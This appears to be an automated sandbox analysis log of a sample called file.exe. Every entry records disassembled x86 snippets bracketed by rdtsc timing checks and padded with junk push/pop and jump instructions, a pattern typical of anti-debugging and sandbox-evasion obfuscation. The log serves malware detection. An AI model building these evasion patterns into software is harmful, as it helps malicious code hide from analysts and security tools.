Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A6A2 second address: 99A6DE instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB7D50A5ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FB7D50A5EE4h 0x00000010 jmp 00007FB7D50A5EE2h 0x00000015 pop eax 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b pushad 0x0000001c popad 0x0000001d push eax 0x0000001e pop eax 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A6DE second address: 99A6E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A881 second address: 99A887 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 99A887 second address: 99A897 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007FB7D509B84Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 999913 second address: 999937 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D50A5EDDh 0x00000009 popad 0x0000000a popad 0x0000000b jg 00007FB7D50A5EFDh 0x00000011 push ebx 0x00000012 jp 00007FB7D50A5ED6h 0x00000018 pop ebx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A2DE1 second address: 9A2DE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A2DE5 second address: 9A2DEF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB7D50A5ED6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A2DEF second address: 9A2DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 je 00007FB7D509B846h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A2F5C second address: 9A2F94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FB7D50A5EE8h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB7D50A5EE7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9A5A60 second address: 9A5A64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B2544 second address: 9B255A instructions: 0x00000000 rdtsc 0x00000002 jng 00007FB7D50A5ED6h 0x00000008 jmp 00007FB7D50A5EDCh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6DAD second address: 9B6DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6DB1 second address: 9B6DCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB7D50A5EE1h 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6DCC second address: 9B6DD7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B696C second address: 9B6970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6970 second address: 9B6984 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB7D509B846h 0x00000008 ja 00007FB7D509B846h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6984 second address: 9B6988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6B02 second address: 9B6B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6B08 second address: 9B6B24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EDCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007FB7D50A5EDCh 0x0000000f jnl 00007FB7D50A5ED6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9B6B24 second address: 9B6B29 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C0205 second address: 9C022F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jnp 00007FB7D50A5ED6h 0x0000000b pushad 0x0000000c popad 0x0000000d pop eax 0x0000000e pushad 0x0000000f jmp 00007FB7D50A5EE7h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D74EF second address: 8D74F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D74F5 second address: 8D74FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D74FD second address: 8D7504 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 8D7504 second address: 8D7511 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007FB7D50A5EE2h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C0091 second address: 9C009F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 jbe 00007FB7D509B846h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C009F second address: 9C00A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9C00A9 second address: 9C00BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 popad 0x0000000a jo 00007FB7D509B854h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF819 second address: 9CF823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FB7D50A5ED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CF823 second address: 9CF82D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CE452 second address: 9CE456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CE456 second address: 9CE4B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B84Fh 0x00000007 jmp 00007FB7D509B858h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 ja 00007FB7D509B846h 0x00000017 jmp 00007FB7D509B84Dh 0x0000001c jmp 00007FB7D509B84Bh 0x00000021 popad 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 jnp 00007FB7D509B846h 0x0000002b pushad 0x0000002c popad 0x0000002d pop edi 0x0000002e push ebx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CE4B2 second address: 9CE4B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CE4B9 second address: 9CE4D3 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB7D509B848h 0x00000008 push ebx 0x00000009 jmp 00007FB7D509B84Dh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9CEA75 second address: 9CEA7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FB7D50A5ED6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3219 second address: 9D321D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D321D second address: 9D323E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FB7D50A5EEFh 0x0000000c jmp 00007FB7D50A5EE3h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3392 second address: 9D3397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D3397 second address: 9D33AD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 js 00007FB7D50A5ED6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FB7D50A5ED6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D731B second address: 9D7325 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D7325 second address: 9D732B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9D732B second address: 9D735B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FB7D509B856h 0x00000012 jl 00007FB7D509B846h 0x00000018 jnp 00007FB7D509B846h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E5520 second address: 9E5526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E5526 second address: 9E552B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E552B second address: 9E5533 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E5533 second address: 9E5537 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6CE7 second address: 9E6CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9E6CF1 second address: 9E6D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FB7D509B854h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FB7D509B84Ch 0x00000012 popad 0x00000013 pushad 0x00000014 jo 00007FB7D509B84Ch 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F48D8 second address: 9F48DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 9F48DC second address: 9F48E2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C9C9 second address: A0C9D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FB7D50A5ED6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0C9D8 second address: A0CA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB7D509B855h 0x00000009 jmp 00007FB7D509B84Eh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 je 00007FB7D509B846h 0x0000001a jmp 00007FB7D509B84Bh 0x0000001f jmp 00007FB7D509B856h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0CBC1 second address: A0CBC7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0D5B4 second address: A0D5B9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0D88A second address: A0D8A0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jc 00007FB7D50A5ED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 jno 00007FB7D50A5ED6h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A0D8A0 second address: A0D8CD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jno 00007FB7D509B846h 0x0000000f jmp 00007FB7D509B855h 0x00000014 pop esi 0x00000015 jbe 00007FB7D509B84Eh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A104DB second address: A104E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A104E0 second address: A104E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A105B2 second address: A105B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A105B6 second address: A105BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A105BA second address: A105C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A105C0 second address: A105C5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A107B6 second address: A107CD instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB7D50A5ED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c jc 00007FB7D50A5EE0h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1082F second address: A10845 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007FB7D509B846h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A10845 second address: A1084B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A1084B second address: A10902 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D509B859h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a sub dx, 53F5h 0x0000000f push 00000004h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007FB7D509B848h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b xor dword ptr [ebp+122D248Fh], esi 0x00000031 call 00007FB7D509B849h 0x00000036 pushad 0x00000037 push esi 0x00000038 jp 00007FB7D509B846h 0x0000003e pop esi 0x0000003f pushad 0x00000040 jmp 00007FB7D509B857h 0x00000045 jc 00007FB7D509B846h 0x0000004b popad 0x0000004c popad 0x0000004d push eax 0x0000004e pushad 0x0000004f push ebx 0x00000050 push edx 0x00000051 pop edx 0x00000052 pop ebx 0x00000053 jmp 00007FB7D509B84Bh 0x00000058 popad 0x00000059 mov eax, dword ptr [esp+04h] 0x0000005d push eax 0x0000005e push edx 0x0000005f jne 00007FB7D509B85Dh 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A10902 second address: A10929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FB7D50A5ED6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A10929 second address: A1093B instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB7D509B846h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007FB7D509B846h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11F75 second address: A11F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11F7B second address: A11F89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11F89 second address: A11F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11F8D second address: A11F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A11F93 second address: A11FCA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FB7D50A5EE8h 0x00000008 jmp 00007FB7D50A5EE5h 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B00D2 second address: 50B00DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 880Eh 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B00DB second address: 50B016D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB7D50A5EE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FB7D50A5EDEh 0x00000011 xor eax, 56A5E688h 0x00000017 jmp 00007FB7D50A5EDBh 0x0000001c popfd 0x0000001d mov dx, cx 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 call 00007FB7D50A5EDBh 0x00000028 pushfd 0x00000029 jmp 00007FB7D50A5EE8h 0x0000002e jmp 00007FB7D50A5EE5h 0x00000033 popfd 0x00000034 pop ecx 0x00000035 movsx edx, ax 0x00000038 popad 0x00000039 xchg eax, ebp 0x0000003a push eax 0x0000003b push edx 0x0000003c jmp 00007FB7D50A5EDFh 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50B016D second address: 50B01CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FB7D509B855h 0x0000000b sub cx, 9F16h 0x00000010 jmp 00007FB7D509B851h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov ebp, esp 0x0000001b jmp 00007FB7D509B84Eh 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FB7D509B857h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50A0011 second address: 50A0015 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50A0015 second address: 50A001B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 50E0172 second address: 50E0178 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 507011E second address: 5070147 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FB7D509B854h 0x0000000a sub ah, 00000058h 0x0000000d jmp 00007FB7D509B84Bh 0x00000012 popfd 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070147 second address: 507014C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 507014C second address: 5070165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, bx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FB7D509B84Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5070165 second address: 507018B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, AE64h 0x00000007 mov di, 4CD0h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push dword ptr [ebp+0Ch] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FB7D50A5EE1h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 507018B second address: 5070191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5090BCD second address: 5090C0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, F99Ah 0x00000007 mov ch, dl 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d jmp 00007FB7D50A5EDAh 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FB7D50A5EDCh 0x0000001c adc esi, 4DA20D08h 0x00000022 jmp 00007FB7D50A5EDBh 0x00000027 popfd 0x00000028 mov cx, 777Fh 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5090C0C second address: 5090C4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, bh 0x00000005 mov eax, 78817413h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e pushad 0x0000000f mov dx, cx 0x00000012 call 00007FB7D509B850h 0x00000017 jmp 00007FB7D509B852h 0x0000001c pop eax 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push esi 0x00000024 pop edx 0x00000025 push esi 0x00000026 pop edx 0x00000027 popad 0x00000028 rdtsc
